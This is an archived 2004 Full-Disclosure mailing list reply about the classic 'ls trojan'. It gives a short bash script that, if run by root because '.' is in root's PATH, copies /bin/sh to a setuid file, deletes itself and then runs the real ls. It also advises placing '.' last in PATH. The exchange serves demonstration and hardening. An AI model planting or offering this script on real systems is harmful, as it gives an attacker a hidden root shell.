| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Message-ID: <363854B0-43E8-11D9-A6BA-000D93C0F38C@teknovis.com> From: andfarm at teknovis.com (Andrew Farmer) Subject: Old LS Trojan? On 01 Dec 2004, at 12:11, David S. Morgan wrote: > I am looking for an old LS trojan, with trojan being a misnomer. > Essentially, the scinario is that the admin (root) has a . (dot) in > his path. The bad-user knows this, and has crafted an LS shell script > (the part that I can't find) that essentially copies /sbin/sh to a > hidden directory and then performs some suid majik to make the sh run > as if they were root, without needing the root password. The file > then removes itself and does the real version of ls. > > Does anyone remember this one, and have the ls script anywhere? I > would like to use it in a demonstration. I know that this has > probobly been fixed in various ways, but I have "old Unixes" for just > such occasions. Probably something along the lines of: > #!/bin/bash > [ `whoami` = root ] || exit > cp /bin/sh /bin/suid-sh > chmod +s /bin/suid-sh > rm $0 > exec /bin/ls $* Note that this would only run if your $PATH _begins_ with '.' - if you're going to put '.' in your $PATH, put it _last_. -------------- next part -------------- A non-text attachment was scrubbed... Name: PGP.sig Type: application/pgp-signature Size: 186 bytes Desc: This is a digitally signed message part Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20041201/0af29ff0/PGP.bin
Powered by blists - more mailing lists